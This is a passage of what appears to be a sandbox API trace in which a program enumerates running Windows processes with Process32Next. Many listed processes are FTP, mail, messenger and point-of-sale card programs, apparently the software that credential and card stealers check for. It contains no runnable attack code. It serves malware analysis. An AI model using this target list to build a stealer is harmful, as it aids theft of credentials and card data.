szExeFile="svchost.exe")) returned 1 [0201.423] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.463] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0201.508] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.524] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.526] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.528] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.530] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.532] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.533] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.535] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0201.537] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0201.543] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.545] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0201.547] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.550] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0201.552] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0201.556] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0201.627] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0201.630] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0201.633] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0201.635] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.636] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.638] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.640] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.642] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.644] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.647] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0201.648] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0201.650] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0201.652] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0201.653] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0201.656] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0201.659] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0201.663] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0201.666] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0201.683] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0201.686] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0201.689] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0201.691] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0201.694] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0201.697] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0201.699] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0201.702] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0201.704] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0201.707] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0201.710] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0201.712] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0201.715] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0201.726] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0201.729] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0201.732] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0201.735] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0201.738] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0201.743] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0201.746] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0201.748] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0201.751] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0201.754] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0201.757] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0201.759] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0201.767] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0201.770] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0201.773] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0201.776] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0201.778] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0201.783] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0201.786] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0201.789] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0201.791] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0201.794] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0201.797] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0201.800] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0201.805] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0201.808] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0201.811] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0201.813] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0201.815] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0201.817] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0201.819] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0201.821] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0201.823] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0201.825] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0201.827] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0201.829] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0201.831] Process32Next (in: hSnapshot=0x20b8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 